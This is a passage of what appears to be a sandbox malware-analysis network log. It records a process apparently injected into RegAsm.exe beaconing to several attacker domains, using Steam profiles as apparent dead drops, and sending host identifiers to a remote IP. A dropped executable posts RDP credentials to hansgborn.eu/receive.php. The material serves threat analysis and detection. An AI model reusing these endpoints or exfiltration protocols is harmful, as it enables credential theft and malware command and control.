2024-09-26 22:15:18 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49719	188.114.96.3	443	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:19 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vozmeatillu.shop
2024-09-26 22:15:19 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:19 UTC	770	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lqqm64jlk752ujv2g6ghauqtiq; expires=Mon, 20 Jan 2025 16:01:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jQUTqxKQBFA1nqn9xPIy7ds7VoZJqwLQ%2FJXhZIsnxhKkVuc0f9aNp1UZbxLlahpshy4YSYvgXV5kf8YvSgu%2FZ8%2BqKY8TMSSifIPbISPnTi5eL3GhN%2F0bSrRRukOaq%2BETb4XU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969cab28104297-EWR
2024-09-26 22:15:19 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49721	104.21.58.182	443	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:20 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawzhotdog.shop
2024-09-26 22:15:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:20 UTC	762	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=on4g4db76unoj18f4ut0q7c9oc; expires=Mon, 20 Jan 2025 16:01:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x3z3UuekV0uzLJ2azssidWp16V9a28kGsiL2IBFck3B1dFn9IqfFU1zklxvqNv3x5E6eaexloYn4Dgm8v%2B2pWM2Q31UMSTVB5WWh5I07weyjoz9OeUgLi541DOmmQDHbp5bF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969cb14a3143cf-EWR
2024-09-26 22:15:20 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	188.114.97.3	443	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:21 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fragnantbui.shop
2024-09-26 22:15:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:21 UTC	768	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=natbg4omcq1k7d82bs6pt64b21; expires=Mon, 20 Jan 2025 16:02:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tGQxEEvaYEZbH4%2Bo76pLxLqh6SOJ6Ygk0E8TYrZKuyvDB6KvC1t54d7lWjhI15lJZSfw4Hjkujvs2Uz0cMZ0reh4qFE7u8JAw18In8KZU%2FVjUECu%2BzyY%2BMf44wwgEDtgm1nF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969cb7cb1815af-EWR
2024-09-26 22:15:21 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49724	188.114.96.3	443	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:22 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stogeneratmns.shop
2024-09-26 22:15:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:22 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pqrqe8thj2m7i652ta7al8gsb6; expires=Mon, 20 Jan 2025 16:02:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cvv5RfqfR7ebXb%2BSE3X4mjVU8VTwU8QOobv%2BYO873VPJWWsCa1gsY5AAWqcaiA1Cw9WgqDcYiJLpqNGkWa%2BFzZQE4sWG%2BCUvKCKRhVh51MY%2FGfzyC2EYQZu146tJGNoZPaWRCaA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969cbe0b761a38-EWR
2024-09-26 22:15:22 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49725	172.67.208.139	443	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:23 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: reinforcenh.shop
2024-09-26 22:15:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:23 UTC	764	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=as7k3i4rh769g1f5n7m11pd8dj; expires=Mon, 20 Jan 2025 16:02:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bjpzWAJQdc1X5aD1uJY9WHhqkG0B7E9TKKKCEn9eaDu8B4ZySBeCkDJQcJ1CEKwaYeN%2BaaXQ2E3PQ01dKuTD1jklIS2mhSdKsXgUG6CPNb7QvvCGbf6IrtD5giF8Tlns%2F7Jf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969cc43cdf7285-EWR
2024-09-26 22:15:23 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49726	104.102.49.254	443	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:24 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-26 22:15:25 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 22:15:25 GMT Content-Length: 34663 Connection: close Set-Cookie: sessionid=497a5b68e925e59b7cdb7510; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 22:15:25 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 22:15:25 UTC	16384	IN	Data Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
2024-09-26 22:15:25 UTC	3765	IN	Data Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49727	172.67.128.144	443	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:25 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ballotnwu.site
2024-09-26 22:15:25 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:26 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p8qie3qvpscss67nulpdpg0rak; expires=Mon, 20 Jan 2025 16:02:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wVWpMwHvp1l0dgmEDeVkPoKIboxMgi02%2BGyZa67NzqcqhT0vchYTgnU3hptXsgzWcn%2B4H9hXuyk69MK25Z%2FslHQEbY6%2F2%2FkueBtcpLiwEH%2B4y3x89vau0iv3wrvCgr8Jbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969cd2baba0f6b-EWR
2024-09-26 22:15:26 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49730	188.114.97.3	443	6420	C:\Users\userBGIJEGCGDG.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:37 UTC	165	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: hansgborn.eu Content-Length: 58 Expect: 100-continue Connection: Keep-Alive
2024-09-26 22:15:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-26 22:15:37 UTC	58	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 52 44 50 55 73 65 72 5f 36 31 35 66 62 66 64 65 26 70 61 73 73 77 6f 72 64 3d 56 32 34 68 46 4c 7a 78 34 6a 71 75 Data Ascii: ip=8.46.123.33&user=RDPUser_615fbfde&password=V24hFLzx4jqu
2024-09-26 22:15:37 UTC	601	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2BQO4jiLR4b5bHM200LDel8te8ApSDc2Zz%2Bl57E4DUyeBgzIqVkawG7KkeTLPzVlQOMVAQw1CTqlB0prElKMYOOqvvD2R1Ni2GhNo8bYoTOCGlsL%2FnuyWxQxRB5QHPM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969d1b0db919b6-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49731	104.102.49.254	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:42 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:42 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 22:15:42 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=a2e8e1e3807f9bcfc2eb1d34; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 22:15:42 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 22:15:42 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 22:15:42 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 22:15:42 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49732	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:43 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49733	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:45 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:45 UTC	255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 39 37 46 37 44 42 41 32 31 38 31 39 34 33 30 31 37 39 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 2d 2d 0d 0a Data Ascii: ------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="hwid"A897F7DBA218194301792-a33c7340-61ca------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GIEHJKEBAAEBGCAAEBFH--
2024-09-26 22:15:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
